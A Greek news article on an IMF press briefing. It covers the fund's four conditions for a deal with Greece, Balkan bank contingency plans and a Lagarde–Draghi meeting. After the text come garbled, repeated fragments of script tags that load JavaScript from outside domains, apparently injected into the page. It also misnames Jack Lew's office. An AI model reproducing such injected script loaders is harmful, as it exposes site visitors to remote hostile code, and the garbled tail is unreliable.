Ανατροπή απο ΔΝΤ: 4 προαπαιτούμενα για συμφωνία με την Αθήνα

Τα τέσσερα προαπαιτούμενα για να υπάρξει μία «αξιόπιστη»– όπως είπε- συμφωνία για την Ελλάδα έθεσε ο εκπρόσωπος του ΔΝΤ κατά το καθιερωμένο press briefing στα κεντρικά γραφεία του Οργανισμού στην Ουάσινγκτον.

Ο κ. Τζέρι Ράις είπε ότι για να ​υπάρξει μία τέτοια συμφωνίαπρέπει να είναι αξιόπιστη από πλευράς δημοσιονομικών μέτρων, μεταρρυθμίσεων, χρηματοδότησης του προγράμματος αλλά και βιωσιμότητας του χρέους.

Είναι η πρώτη φορά που ο Ταμείο θέτει δημόσια και χωρίς περιστροφές στο τραπέζι της διαπραγμάτευσης για να υπάρξει συμφωνία ,το θέμα του χρηματοδοτικού κενού στην Ελλάδα και της βιωσιμότητας του χρέους, παρότι τα δύο αυτά ζητήματα όλο το προηγούμενο διάστημα κυριαρχούσαν με διαρροές στον διεθνή και ελληνικό τύπο.

Ο κ. Ράις αντέκρουσε την κατηγορία ότι «το ΔΝΤ δεν είναι ευέλικτο» διαβεβαιώνοντας ότι «είμαστε ευέλικτοι σε ιδέες και προτάσεις» οι οποίες όμως- όπως επισήμανε- πρέπει να υπηρετούν τους στόχους του προγράμματος στην Ελλάδα. Πρόσθετε πάντως ότι «το ΔΝΤ δουλεύει εντατικά με όλες τις πλευρές για να κλείσει η συμφωνία».

Σε ό,τι αφορά την επικείμενη ενημέρωση στις 2.30 ώρα Αμερικής που θα παρέχει ο Πολ Τόμσεν στο ΔΣ του ΔΝΤ για την Ελλάδα, ο κ. Ράις είπε ότι αυτές οι ενημερώσεις συμβαίνουν τακτικά και αφορούν πολλές χώρες όπου το ΔΝΤ έχει παρουσία.

Πάντα καταρτίζουμε διάφορα σενάρια

Ο κ. Ράις εκλήθη να σχολιάσει και τις πρόσφατες δηλώσεις του Γιεργκ Ντεκρέσιν, αναπληρωτή διευθυντή του ΔΝΤ για την κεντρική και ανατολική Ευρώπη, ότι το Ταμείο και γειτονικές χώρες της Ελλάδας εξετάζουν σχέδια περιορισμού της διάχυσης μια ελληνικής κρίσης , είπε πως αυτά τα σχέδια αφορούν στις θυγατρικές των ελληνικών τραπεζών στα Βαλκάνια.

«Πάντα καταρτίζουμε διάφορα σενάρια, αυτό είναι μέρος των υπηρεσιών που παρέχουμε στα μέλη μας» ανέφερε διευκρινίζοντας ότι οι θυγατρικές τράπεζες των ελληνικών τραπεζών στα Βαλκάνια θα έχουν πρόσθετες ανάγκες ρευστότητας, σε περίπτωση που επιδεινωθεί η κατάσταση στην Ελλάδα και για αυτό το λόγο οι μηχανισμοί εποπτείας των τραπεζών σε αυτές τις χώρες παρακολουθούν στενά τις εξελίξεις.

Ακολούθησε και ένα πιο ευθύ ερώτημα για την ύπαρξη σχεδίου περιορισμού της κρίσης (contingency plan) για την ίδια την Ελλάδα και για το τι περιλαμβάνει αυτό απάντησε:«Δεν αποκαλύπτουμε τις λεπτομέρειες για προφανείς λόγους».

Δεν έχουμε πλήρη εικόνα για την κατάσταση ρευστότητας στην Ελλάδα

Σχετικά με την κατάσταση ρευστότητας στην Ελλάδα, καθώς η χώρα αποπλήρωσε το Ταμείο με ανορθόδοξο τρόπο ο Ράις είπε πως το ΔΝΤ δεν διαθέτει λεπτομερείς πληροφορίες για την κατάσταση.

Ερωτηθείς για την ενδεχόμενη συμμέτοχη της Ελλάδας στην αναπτυξιακή τράπεζα των BRICS δήλωσε άγνοια. «Ενημερώθηκα από τα δημοσιεύματα. Δεν ξέρω κάτι σχετικό. Είναι καθολικά θέμα της ελληνικής κυβέρνησης», ανέφερε.

Τετ α τετ Λαγκάρντ – Ντράγκι

Η συνάντηση Λαγκάρντ- Ντράγκι στην Ουάσινγκτον σύμφωνα με τον εκπρόσωπο τύπου του ΔΝΤ θα έχει στο στο μενού  και την Ελλάδα. 

Νωρίτερα,  οι Financial Times ανέφεραν ότι ο πρόεδρος της ΕΚΤ Μάριο Ντράγκι θα συναντηθεί την Πέμπτη το απόγευμα και με τον υπουργό Εξωτερικών των ΗΠΑ Τζακ Λιου, αφήνοντας να εννοηθεί ότι στην ατζέντα των συζητήσεων μεταξύ των δύο ανδρών θα βρίσκεται και η Ελλάδα.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >